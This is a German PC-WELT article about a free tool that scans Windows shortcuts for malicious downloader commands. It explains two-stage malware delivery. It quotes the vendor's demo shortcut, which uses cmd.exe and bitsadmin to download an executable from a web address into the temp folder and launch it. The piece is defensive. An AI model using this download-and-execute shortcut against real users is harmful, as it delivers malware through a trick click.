Spezial-Tool checkt Verknüpfungen auf Viren

Eine Verknüpfung unter Windows kann problemlos einen Virus aus dem Internet laden und starten. So verhindern Sie das. [...]

Das Tool Shurtcut Scanner zeigt Ihnen alle in Windows hinterlegten Verknüpfungen (Shortcuts) an. Das ist zum Beispiel dann sinnvoll, wenn Sie Ihren Rechner auf gefährliche Shortcuts überprüfen wollen. Darauf weist der Hersteller des Tools hin. Was zunächst etwas merkwürdig klingt („gefährliche Shortcuts“), ist aber ein durchaus berechtigter Hinweis. Denn der Angriff mit Schadcode auf einen PC läuft sehr oft in zwei Schritten ab.
Zunächst versuchen die Virenverbreiter, einen sogenannten Downloader auf den PC zu platzieren. Das ist ein kleines Programm, das nichts anders macht, als den eigentlichen Virus auf den PC herunterzuladen und zu starten. Der Grund für die Zweiteilung in Download-Code und Virus liegt bei den üblichen Schutzmechanismen. So setzen etwa alle großen Maildienst-Anbieter Virenscanner ein, die den Anhang jeder Mail scannen. Finden Sie dort einen Virus, wird dieser gelöscht. Ein Download-Code dagegen sieht für einen Virenscanner oft harmlos aus. Der Code richtet ja scheinbar nicht viel an. Entsprechend leichter ist es für den Angreifer einen Downloader per Mail zu verteilen.
Verknüpfungen: Auch hinter einer Verknüpfung kann sich ein Download-Code verstecken. Der Code kann sogar komplett aus Bordmitteln von Windows bestehen. So muss ein Angreifer nicht einmal mehr eine EXE- oder DLL-Datei auf den PC schleusen, sondern nur noch den Code, der eine Verknüpfung unter Windows erstellen kann.
Der Hersteller des Tools Shurtcut Scanner, Phrozen Software, gibt ein eindrückliches Beispiel für einen solchen Code, den Sie auch selber ausprobieren können. Klicken Sie mit der rechten Maustaste auf Ihren Desktop und wählen Sie „Neu -> Verknüpfung“. In das folgende Feld geben Sie diesen Befehl ein: Befehl cmd.exe /C „%windir%System32bitsadmin.exe /transfer downloader /priority
normalhttps://phrozensoft.com/uploads/2016/09/
Winja_2_6084_65441_setup.exe%temp%setup.exe
& %temp%setup.exe“
Ein Klick auf „Weiter“ und „Fertigstellen“ legt die neue Verknüpfung auf den Desktop ab. Nun Bedarf es noch eines kleinen Tricks, den Anwender zum Klick auf die Verknüpfung zu überreden und schon landet Code aus dem Internet auf Ihrem PC und wird gestartet. In diesem Beispiel ist es aber nur das Tool Winja vom Herteller Phrozen Software. Es lädt auf Wunsch Dateien zu einem Online-Virenscanner hoch.
Shortcut Scanner nutzen: Starten Sie das Tool Shortcut Scanner in der für Sie passenden Version, also als 32- oder 64-Bit-Version. Es läuft ohne Installation. Klicken Sie auf das Ordnersymbol und wählen Sie „Full Scan“, um alle Festplatten nach Verknüpfungen durchsuchen zu lassen.
Nach dem Suchlauf listet das Tool alle verdächtigen Verknüpfungen auf und sortiert sie nach ihrer möglichen Gefährlichkeit („Dangerous“, „Suspicous“ und „Broken“). Eine eindeutige Aussage über eine Verknüpfung macht das Tool nicht, sodass Sie sich den Fund noch einmal selber genau prüfen müssen. Möchten Sie eine Verknüpfung beseitigen, dann setzen Sie einen Haken davor und klicken oben auf das Radiergummisymbol. Dort wählen Sie dann die Gefährlichkeitsstufe aus, die Sie bereinigen wollen. 
*Arne Arnold arbeitet seit über 15 Jahren bei der PC-WELT als Redakteur in den Bereichen Software und Internet

Mehr Artikel

Frauen berichten vielfach, dass ihre Schmerzen manchmal jahrelang nicht ernst genommen oder belächelt wurden. Künftig sollen Schmerzen gendersensibel in 3D visualisiert werden (c) mit KI generiert/DALL-E
News

Schmerzforschung und Gendermedizin

Im Projekt „Embodied Perceptions“ unter Leitung des AIT Center for Technology Experience wird das Thema Schmerzen ganzheitlich und gendersensibel betrachtet: Das Projektteam forscht zu Möglichkeiten, subjektives Schmerzempfinden über 3D-Avatare zu visualisieren. […]

News

KI ist das neue Lernfach für uns alle

Die Mystifizierung künstlicher Intelligenz treibt mitunter seltsame Blüten. Dabei ist sie weder der Motor einer schönen neuen Welt, noch eine apokalyptische Gefahr. Sie ist schlicht und einfach eine neue, wenn auch höchst anspruchsvolle Technologie, mit der wir alle lernen müssen, sinnvoll umzugehen. Und dafür sind wir selbst verantwortlich. […]

Be the first to comment

Leave a Reply

Your email address will not be published.


*